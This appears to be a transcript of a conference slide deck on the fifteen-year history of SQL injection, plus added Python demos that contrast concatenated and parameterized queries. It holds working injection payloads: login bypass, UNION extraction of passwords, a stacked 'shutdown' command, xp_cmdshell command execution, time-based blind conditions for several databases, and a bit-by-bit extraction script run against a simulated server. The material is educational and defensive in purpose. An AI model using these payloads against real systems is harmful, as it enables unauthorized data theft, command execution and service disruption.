Happy 15th Birthday, SQL Injection
Los Amantes del Círculo Polar
25 – Dec – 1998: The birth
http://www.phrack.org/issues.html?id=8&issue=54
' or '1'='1
q="Select uid from users where uid='"+$user+"' and pass='"+$pass+"';"
admin
‘ or ‘1’=‘1
q="Select uid from users where uid='admin' and pass='' or '1'='1';"
14 – Aug – 2007: IBM
http://www.docstoc.com/docs/39896830/IBM-Rational-ClearQuest-Web-Login-Bypass-SQL-Injection-Vulnerability
In-band
-1' union select 1,1,1,1,username,1,'a',1 from users --
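The login bypass and the in-band UNION extraction above, as an added example that is not part of the original deck: Python driving an in-memory SQLite database, with the deck's string-concatenated queries next to parameterized versions of the same queries. The table contents (users, noticias) and the sample passwords are constructed for the demo; only the query shapes and payloads come from the slides.

```python
import sqlite3

# Constructed sample data (not from the deck): a users table and the
# "noticias" table the deck's second query reads from.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (uid text, pass text)")
    conn.executemany("insert into users values (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    conn.execute("create table noticias (id integer, title text)")
    conn.executemany("insert into noticias values (?, ?)",
                     [(1, "First post"), (2, "Second post")])
    return conn

def login_vulnerable(conn, user, password):
    # Same string concatenation as the deck's q="Select uid ..." line:
    # the input becomes part of the SQL text, so a quote in it rewrites the WHERE.
    q = ("select uid from users where uid='" + user
         + "' and pass='" + password + "';")
    row = conn.execute(q).fetchone()
    return row[0] if row else None

def login_parameterized(conn, user, password):
    # Fix: placeholders keep the query structure fixed; the input is bound as data.
    q = "select uid from users where uid=? and pass=?;"
    row = conn.execute(q, (user, password)).fetchone()
    return row[0] if row else None

def news_vulnerable(conn, news_id):
    # Numeric context with no quotes at all (deck's "where id="+$id line):
    # still injectable, and a UNION pulls rows from any other table in-band.
    q = "select title from noticias where id=" + news_id + ";"
    return [r[0] for r in conn.execute(q).fetchall()]

def news_parameterized(conn, news_id):
    # The bound value is compared as a value, never parsed as SQL.
    q = "select title from noticias where id=?;"
    return [r[0] for r in conn.execute(q, (news_id,)).fetchall()]

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin", "' or '1'='1"))      # admin (bypassed)
    print(login_parameterized(db, "admin", "' or '1'='1"))   # None
    print(news_vulnerable(db, "-1 union select pass from users --"))     # passwords leak
    print(news_parameterized(db, "-1 union select pass from users --"))  # []
```

With the `' or '1'='1` password the concatenated query becomes `... and pass='' or '1'='1'`, and since AND binds tighter than OR every row matches; the parameterized query looks for a user whose password literally is that string. The UNION payload works even without quotes because the numeric id is concatenated raw, and the trailing `--` comments out whatever the application appends.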
2001 – Out-band
http://www.blackhat.com/presentations/bh-asia-01/litchfield/litchfield.doc
Yesterday - [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'or'.
q="Select title from noticias where id="+$id+";"
Id=1 or 1=(select top 1 username from sysusers)
Jul – 2007: Microsoft Partner Programme
2002 – Advanced SQL Injection Techniques
https://sparrow.ece.cmu.edu/group/731-s11/readings/anley-sql-inj.pdf
Advanced Tricks
Id=1; shutdown --
Username: '; begin declare @ret varchar(8000) set @ret=':' select
@ret=@ret+' '+username+'/'+password from users where username>@ret
select @ret as ret into foo end--
Username: ' union select ret,1,1,1 from foo--
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting
the varchar value ': admin/r00tr0x! guest/guest chris/password
fred/sesame' to a column of data type int.
exec master..xp_cmdshell 'dir'
27 – Mar - 2007
Outer Bands
DNS Queries
FTP Sites
SMB Files
Remote DB
Web Files
Log Files
2002 - Blind
http://server/miphp.php?id=1 and 1=1
http://server/miphp.php?id=1 and 1=0
True
False
2010 – US Army
2002 – Time Based Blind SQL Injection
http://www.northernfortress.net/more_advanced_sql_injection.pdf
(more) Advanced Tricks
if (ascii(substring(@s, @byte, 1)) & power(2, @bit)) > 0 waitfor delay '0:0:5'
ping -n 10 127.0.0.1
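The bit-by-bit extraction loop behind the `waitfor delay` condition above (and the 1=1 / 1=0 True/False probes of the "2002 – Blind" slide), as an added example that is not from the original deck: Python that builds one request per (byte, bit) pair, measures the response time, and reassembles the string. The server is simulated by `fake_server`, a constructed stand-in that evaluates the deck's condition against a made-up `SECRET` and sleeps a scaled-down `DELAY`; swapping it for a real HTTP request (or for a page-differs test, or the `ping -n` delay via xp_cmdshell) leaves the loop unchanged.

```python
import re
import time

# Constructed simulation (not from the deck): the value the injected condition
# reads through @s, and the server-side delay scaled down from '0:0:5'.
SECRET = "sa"
DELAY = 0.02   # seconds the fake server sleeps when the condition is true

def payload(byte_pos, bit):
    """The deck's SQL Server condition with the loop variables filled in."""
    return ("if (ascii(substring(@s, %d, 1)) & power(2, %d)) > 0 "
            "waitfor delay '0:0:5'" % (byte_pos, bit))

def fake_server(sql):
    """Stand-in for the injectable page: parses the byte/bit out of the
    payload, sleeps DELAY when the bit is set in SECRET, and returns the
    response time the attacker would observe."""
    m = re.search(r"substring\(@s, (\d+), 1\)\) & power\(2, (\d+)\)", sql)
    pos, bit = int(m.group(1)), int(m.group(2))
    start = time.monotonic()
    # SUBSTRING past the end yields '', ASCII('') is NULL, and NULL > 0 is
    # never true, so positions beyond the string never delay.
    if pos <= len(SECRET) and ord(SECRET[pos - 1]) & (1 << bit):
        time.sleep(DELAY)
    return time.monotonic() - start

def extract(request, max_len=32, threshold=DELAY / 2):
    """Recover the string one bit at a time: a slow response means the bit is
    set. An all-zero byte means we ran off the end of the string."""
    out = []
    for pos in range(1, max_len + 1):
        value = 0
        for bit in range(7):            # 7 bits cover printable ASCII
            if request(payload(pos, bit)) > threshold:
                value |= 1 << bit
        if value == 0:
            break
        out.append(chr(value))
    return "".join(out)

if __name__ == "__main__":
    print(extract(fake_server))   # sa
```

Seven requests per character is the cost of a pure bit oracle; a real run keeps the threshold well below the injected delay so that ordinary network jitter is not mistaken for a set bit, and repeats any request whose timing lands near the threshold.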
2004 – Time-Based in Other Databases
SQL Server: 1) ; if … waitfor delay   2) ; exec xp_cmdshell (ping -n)
Oracle: 1) dbms_lock.sleep()   2) PL/SQL injection
MySQL: 1) and sleep() (5.0 or higher)   2) benchmark() functions
Postgres: 1) pg_sleep()
Jun – 2007 : Solar Empire Exploit
http://www.elladodelmal.com/2007/06/blind-sql-injection-ii-de-hackeando-un.html
Apr – 2013: Yahoo!
http://tw.ysm.emarketing.yahoo.com/soeasy/index.php?p=2&scId=113; select SLEEP(5)--
http://www.elladodelmal.com/2013/04/time-based-blind-sql-injection-en-yahoo.html
2007 – Time-Based SQL Injection using Heavy Queries
https://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
Time-Based Using Heavy Queries in MS Access
True
False
Deep Blind SQL Injection
http://labs.portcullis.co.uk/application/deep-blind-sql-injection
Serialized SQL Injection
Arithmetic Blind SQL Injection
RFD
Connection String Parameter Pollution
Xpath Injection
LDAP Injection
OWASP TOP 10 - 2013
Forbidden
Fixing Code Injections isn't the worst job